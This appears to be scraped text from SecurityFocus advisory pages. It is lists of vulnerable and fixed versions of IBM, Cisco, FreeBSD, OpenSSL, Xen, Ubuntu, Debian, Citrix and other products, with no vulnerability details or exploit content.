IBM Security Identity Manager Virtual Appliance 7.0.0.2
IBM Security Identity Manager Virtual Appliance 7.0.0.1
IBM Security Identity Manager Virtual Appliance 7.0.0.0
IBM Security Identity Governance and Intelligence 5.2.1
IBM Security Guardium 10.0
IBM SDK for Node.js 1.2.0.9
IBM SDK for Node.js 1.2.0.8
IBM SDK for Node.js 1.2.0.4
IBM SDK for Node.js 1.2.0.3
IBM SDK for Node.js 1.2.0.2
IBM SDK for Node.js 1.1.0.9
IBM SDK for Node.js 1.1.0.7
IBM SDK for Node.js 1.1.0.6
IBM SDK for Node.js 1.1.0.5
IBM SDK for Node.js 1.1.0.3
IBM SDK for Node.js 1.1.0.2
IBM SDK for Node.js 1.1.0.19
IBM SDK for Node.js 1.1.0.18
IBM SDK for Node.js 1.1.0.15
IBM SDK for Node.js 1.1.0.14
IBM SDK for Node.js 1.1.0.13
IBM SDK for Node.js 1.1.0.12
IBM Real-time Compression Appliance 4.1.2
IBM Rational Developer for i 9.1.1
IBM Rational Developer for i 9.5.0.2
IBM Rational Developer for i 9.5.0.1
IBM Rational Developer for i 9.5
IBM Rational Developer for i 9.1.1.1
IBM Rational Developer for i 9.1
IBM Rational Developer for AIX and Linux 9.1.1
IBM Rational Developer for AIX and Linux 9.1.1.2
IBM Rational Developer for AIX and Linux 9.1.1.1
IBM Rational Developer for AIX and Linux 9.1
IBM Rational Application Developer for WebSphere Software 9.5
IBM Rational Application Developer for WebSphere Software 9.1
IBM PureApplication System 2.2.0.0
IBM PureApplication System 2.1
IBM PureApplication System 2.0
IBM Proventia Network Enterprise Scanner 2.3
IBM PowerKVM 2.1.1 Build 65.6
IBM PowerKVM 2.1.1 Build 65.5
IBM PowerKVM 2.1.1 Build 65.4
IBM PowerKVM 2.1.1 build 57
IBM PowerKVM 3.1 Build 3
IBM PowerKVM 3.1 Build 2
IBM PowerKVM 3.1
IBM PowerKVM 2.1.1 Build 65.1
IBM PowerKVM 2.1.1 build 58
IBM PowerKVM 2.1
IBM Power HMC 8.4.0.0
IBM Power HMC 8.3.0.0
IBM Power HMC 8.2.0.0
IBM Power HMC 8.1.0.0
IBM Power HMC 7.9.0.0
IBM Power HMC 7.3.0.0
IBM MQ Light Client Module for Node.js 1.0.2014091001
IBM MQ Light Client Module for Node.js 1.0.2014090801
IBM MQ Light Client Module for Node.js 1.0.2014090800
IBM MQ Light Client Module for Node.js 1.0.2014091000-red
IBM Initiate Master Data Service Provider Hub 9.7
IBM Initiate Master Data Service Provider Hub 9.5
IBM Initiate Master Data Service 9.7
IBM Initiate Master Data Service 9.5
IBM Initiate Master Data Service 10.1
IBM Initiate Master Data Service 10.0
IBM InfoSphere Master Data Management Standard/Advanced Edition 11.5
IBM InfoSphere Master Data Management Standard/Advanced Edition 11.4
IBM InfoSphere Master Data Management Standard/Advanced Edition 11.3
IBM InfoSphere Master Data Management Standard/Advanced Edition 11.0
IBM InfoSphere Master Data Management Provider Hub 10.0
IBM InfoSphere Data Explorer 8.2-4
IBM InfoSphere Data Explorer 8.2
IBM Image Construction and Composition Tool 2.3.2.0
IBM Image Construction and Composition Tool 2.3.1.0
IBM i 7.2
IBM i 7.1
IBM Flex System Manager 1.3.2 0
IBM Flex System Manager 1.2.1
IBM Flex System Manager 1.2
IBM Flex System Manager 1.1
IBM Flex System Manager 1.3.4.0
IBM Flex System Manager 1.3.3.0
IBM Flex System Manager 1.3.1
IBM Flex System Manager 1.3.0.1
IBM Flex System Manager 1.3.0
IBM Flex System Chassis Management Module 2PET
IBM DataPower Gateways 7.0
IBM DataPower Gateways 7.5.0.1
IBM DataPower Gateways 7.5.0.0
IBM DataPower Gateways 7.2.0.5
IBM DataPower Gateways 7.2.0.4
IBM DataPower Gateways 7.2.0.3
IBM DataPower Gateways 7.2.0.2
IBM DataPower Gateways 7.2.0.1
IBM DataPower Gateways 7.2.0.0
IBM DataPower Gateways 7.1.0.9
IBM DataPower Gateways 7.1.0.8
IBM DataPower Gateways 7.1.0.7
IBM DataPower Gateways 7.1.0.6
IBM DataPower Gateways 7.1.0.5
IBM DataPower Gateways 7.1
IBM DataPower Gateways 7.0.0.9
IBM DataPower Gateways 7.0.0.8
IBM DataPower Gateways 7.0.0.12
IBM DataPower Gateways 7.0.0.11
IBM DataPower Gateways 7.0.0.10
IBM Cognos Insight 10.2.2
IBM Cognos Insight 10.2.1
IBM Cognos Insight 10.2
IBM Business Process Manager Standard 8.5.6
IBM Business Process Manager Standard 8.5.5
IBM Business Process Manager Standard 8.5.7
IBM Business Process Manager Express 8.5.6
IBM Business Process Manager Express 8.5.5
IBM Business Process Manager Express 8.5.7
IBM Aix 7.2
IBM AIX 7.1
IBM AIX 6.1
IBM AIX 5.3
Gentoo Linux
FreeBSD Freebsd 9.3-RELEASE-p9
FreeBSD FreeBSD 9.3-RELEASE-p6
FreeBSD FreeBSD 9.3-RELEASE-p5
FreeBSD Freebsd 9.3-RELEASE-p35
FreeBSD Freebsd 9.3-RELEASE-p34
FreeBSD Freebsd 9.3-RELEASE-p33
FreeBSD Freebsd 9.3-RELEASE-p31
FreeBSD FreeBSD 9.3-RELEASE-p3
FreeBSD Freebsd 9.3-RELEASE-p29
FreeBSD Freebsd 9.3-RELEASE-p25
FreeBSD Freebsd 9.3-RELEASE-p24
FreeBSD Freebsd 9.3-RELEASE-p22
FreeBSD Freebsd 9.3-RELEASE-p21
FreeBSD FreeBSD 9.3-RELEASE-p2
FreeBSD Freebsd 9.3-RELEASE-p13
FreeBSD Freebsd 9.3-RELEASE-p10
FreeBSD FreeBSD 9.3-RELEASE-p1
FreeBSD FreeBSD 9.3
FreeBSD Freebsd 10.2-RELEASE-p9
FreeBSD Freebsd 10.2-RELEASE-p8
FreeBSD Freebsd 10.2-RELEASE-p6
FreeBSD Freebsd 10.2-RELEASE-p11
FreeBSD Freebsd 10.2-RELEASE-p10
FreeBSD Freebsd 10.2
FreeBSD Freebsd 10.1-RELEASE-p9
FreeBSD Freebsd 10.1-RELEASE-p6
FreeBSD Freebsd 10.1-RELEASE-p5
FreeBSD Freebsd 10.1-RELEASE-p28
FreeBSD Freebsd 10.1-RELEASE-p27
FreeBSD Freebsd 10.1-RELEASE-p26
FreeBSD Freebsd 10.1-RELEASE-p25
FreeBSD Freebsd 10.1-RELEASE-p23
FreeBSD Freebsd 10.1-RELEASE-p19
FreeBSD Freebsd 10.1-RELEASE-p17
FreeBSD Freebsd 10.1-RELEASE-p16
FreeBSD FreeBSD 10.1-RELEASE-p1
FreeBSD FreeBSD 10.1
FreeBSD FreeBSD 10.0
Extremenetworks Wireless AP 3965 10.1.1
Extremenetworks Wireless AP 3935 10.1.1
Extremenetworks Wireless AP 3865 10.1.1
Extremenetworks Wireless AP 3825 10.1.1
Extremenetworks Wireless AP 3805 10.1.1
Extremenetworks Wireless AP 3801 10.1.1
Extremenetworks Wireless AP 3715 10.1.1
Extremenetworks ExtremeXOS 0
Cisco WebEx Messenger Service 0
Cisco WebEx Meetings Server 2.5
Cisco WebEx Meetings Server 2.0
Cisco WebEx Meetings Server 1.5.1.6
Cisco WebEx Meetings Server 1.5.1.131
Cisco WebEx Meetings Server 1.5
Cisco WebEx Meetings Server 1.1
Cisco WebEx Meetings Server 1.0
Cisco Videoscape Control Suite Foundation 0
Cisco Unity Connection (UC) 0
Cisco Unified Intelligent Contact Management Enterprise 0
Cisco Unified Contact Center Express 0
Cisco Unified Contact Center Enterprise 0
Cisco Unified Communications Manager Session Management Edition (SME) 0
Cisco Unified Communications Manager (UCM) 0
Cisco Unified Attendant Console Standard 0
Cisco Unified Attendant Console Premium Edition 0
Cisco Unified Attendant Console Enterprise Edition 0
Cisco Unified Attendant Console Department Edition 0
Cisco Unified Attendant Console Business Edition 0
Cisco Unified Attendant Console Advanced 0
Cisco Unified 8945 IP Phone 0
Cisco TelePresence Video Communication Server (VCS) 0
Cisco TelePresence TX 9000 Series 0
Cisco TelePresence System 500-37 0
Cisco TelePresence System 500-32 0
Cisco TelePresence System 3000 Series 0
Cisco TelePresence System 1300 0
Cisco TelePresence System 1100 0
Cisco TelePresence System 1000 0
Cisco TelePresence Server on Virtual Machine 0
Cisco TelePresence Server on Multiparty Media 320 0
Cisco TelePresence Server on Multiparty Media 310 0
Cisco TelePresence Server 8710 7010
Cisco TelePresence Conductor 0
Cisco TelePresence 1310 0
Cisco Registered Envelope Service (CRES) 0
Cisco Proactive Network Operations Center 0
Cisco Prime Performance Manager 0
Cisco Prime Optical for SPs 0
Cisco Prime License Manager 0
Cisco Prime Collaboration Provisioning 0
Cisco Prime Collaboration Deployment 0
Cisco ONS 15454 Series Multiservice Provisioning Platforms 0
Cisco NX-OS Nexus 9000 0
Cisco NX-OS Nexus 5000 0
Cisco Nexus 7000 0
Cisco Nexus 6000 0
Cisco Nexus 3X00 0
Cisco Nexus 3000 0
Cisco Mobility Services Engine 0
Cisco MediaSense 0
Cisco MDS 9000 Series Multilayer Switches 0
Cisco Jabber for Windows 0
Cisco Intrusion Prevention System Solutions (IPS) 0
Cisco IM and Presence Service (CUPS) 0
Cisco Expressway series 0
Cisco Emergency Responder
Cisco Email Security Appliance 0
Cisco Edge 300 Digital Media Player 0
Cisco Computer Telephony Integration Object Server (CTIOS) 0
Cisco Cloupia Unified Infrastructure Controller 0
Cisco Cisco Unified Computing System B-Series (Blade) Servers 0
Cisco Cisco Unified 7800 series IP Phones 0
Cisco ASA Next-Generation Firewall Services 0
Cisco AnyRes Live (CAL) 0
Cisco Agent Desktop
Cisco 8800 Series IP Phones 0
CentOS CentOS 7
CentOS CentOS 6
CentOS CentOS 5 Not Vulnerable: Oracle VM VirtualBox 5.0.16
Oracle Solaris 11.3 SRU 6.5
OpenSSL Project OpenSSL 1.0.2g
OpenSSL Project OpenSSL 1.0.2f
OpenSSL Project OpenSSL 1.0.1s
OpenSSL Project OpenSSL 1.0.1r
IBM Tivoli Provisioning Manager for OS Deployment 7.1.1.20 build 280.6
IBM Tivoli Provisioning Manager for OS Deployment 5.1.1 build 051.07
IBM Tivoli Provisioning Manager for Images 7.1.1.20 build 280.6
IBM SmartCloud Entry 3.2 Appliance fixpac
IBM SmartCloud Entry 3.1 Appliance fixpac
IBM SDK for Node.js 1.2.0.10
IBM SDK for Node.js 1.1.0.20
IBM Real-time Compression Appliance 4.1.2.17
IBM PureApplication System 2.2.1
IBM PureApplication System 2.1.2.2
IBM PureApplication System 2.0.0.1 IF 8
IBM PowerKVM 2.1.1 SP3
IBM PowerKVM 2.1.1 Build 65.7
IBM PowerKVM 3.1 SP1
IBM DataPower Gateways 7.2.0.6
IBM DataPower Gateways 7.1.0.10
IBM DataPower Gateways 7.0.0.13
IBM Cognos Insight 10.2.2 FP 6
IBM Cognos Insight 10.2.1 FP 2 IF 6
IBM Cognos Insight 10.2 FP 1 IF 6
FreeBSD FreeBSD 9.3-STABLE
FreeBSD Freebsd 9.3-RELEASE-p36
FreeBSD Freebsd 10.2-STABLE
FreeBSD Freebsd 10.2-RELEASE-p12
FreeBSD Freebsd 10.1-RELEASE-p29
Extremenetworks Wireless AP 3965 10.11.1
Extremenetworks Wireless AP 3965 10.1.4
Extremenetworks Wireless AP 3935 10.11.1
Extremenetworks Wireless AP 3935 10.1.4
Extremenetworks Wireless AP 3865 10.11.1
Extremenetworks Wireless AP 3865 10.1.4
Extremenetworks Wireless AP 3825 10.11.1
Extremenetworks Wireless AP 3825 10.1.4
Extremenetworks Wireless AP 3805 10.11.1
Extremenetworks Wireless AP 3805 10.1.4
Extremenetworks Wireless AP 3801 10.11.1
Extremenetworks Wireless AP 3801 10.1.4
Extremenetworks Wireless AP 3715 10.11.1
Extremenetworks Wireless AP 3715 10.1.4


SecurityFocus Vulnerabilities

Vulnerable: Xen Xen 4.0.4
Xen Xen 4.0.1
Xen Xen 4.5.0
Xen Xen 4.4.1
Xen Xen 4.4.0
Xen Xen 4.4
Xen Xen 4.3.1
Xen Xen 4.3.0
Xen Xen 4.3
Xen Xen 4.2.3
Xen Xen 4.2.2
Xen Xen 4.2.1
Xen Xen 4.2.0
Xen Xen 4.2
Xen Xen 4.1.6.1
Xen Xen 4.1.5
Xen Xen 4.1.4
Xen Xen 4.1.3
Xen Xen 4.1.2
Xen Xen 4.1.1
Xen Xen 4.1.0
Xen Xen 4.1
Xen Xen 4.0.3
Xen Xen 4.0.2
Xen Xen 4.0.0
Xen Xen 4.0
Xen Xen 3.4.4
Xen Xen 3.4.3
Xen Xen 3.4.2
Xen Xen 3.4.1
Xen Xen 3.4.0
Xen Xen 3.3.2
Xen Xen 3.3.1
Xen Xen 3.3.0
Xen Xen 3.3
Ubuntu Ubuntu Linux 15.04
Ubuntu Ubuntu Linux 14.10
Ubuntu Ubuntu Linux 14.04 LTS
Ubuntu Ubuntu Linux 12.04 LTS i386
Ubuntu Ubuntu Linux 12.04 LTS amd64
SuSE SUSE Linux Enterprise Software Development Kit 11 SP3
+ Linux kernel 2.6.5
SuSE SUSE Linux Enterprise Server 11 SP3
+ Linux kernel 2.6.5
SuSE SUSE Linux Enterprise Server 11 SP1 LTSS
+ Linux kernel 2.6.5
+ Linux kernel 2.6.5
SuSE Linux Enterprise Server 11 SP2 LTSS
SuSE Linux Enterprise Desktop 11 SP3
S.u.S.E. openSUSE 13.2
S.u.S.E. openSUSE 13.1
Gentoo Linux
Debian Linux 6.0 sparc
Debian Linux 6.0 s/390
Debian Linux 6.0 powerpc
Debian Linux 6.0 mips
Debian Linux 6.0 ia-64
Debian Linux 6.0 ia-32
Debian Linux 6.0 arm
Debian Linux 6.0 amd64
Citrix NetScaler SDX 10.5e
Citrix NetScaler SDX 10.5
Citrix NetScaler SDX 10.1
Citrix NetScaler Gateway 10.5.e
Citrix NetScaler Gateway 10.5
Citrix NetScaler Gateway 10.1
Citrix NetScaler ADC 10.5.e
Citrix NetScaler ADC 10.5
Citrix NetScaler ADC 10.1


SecurityFocus Vulnerabilities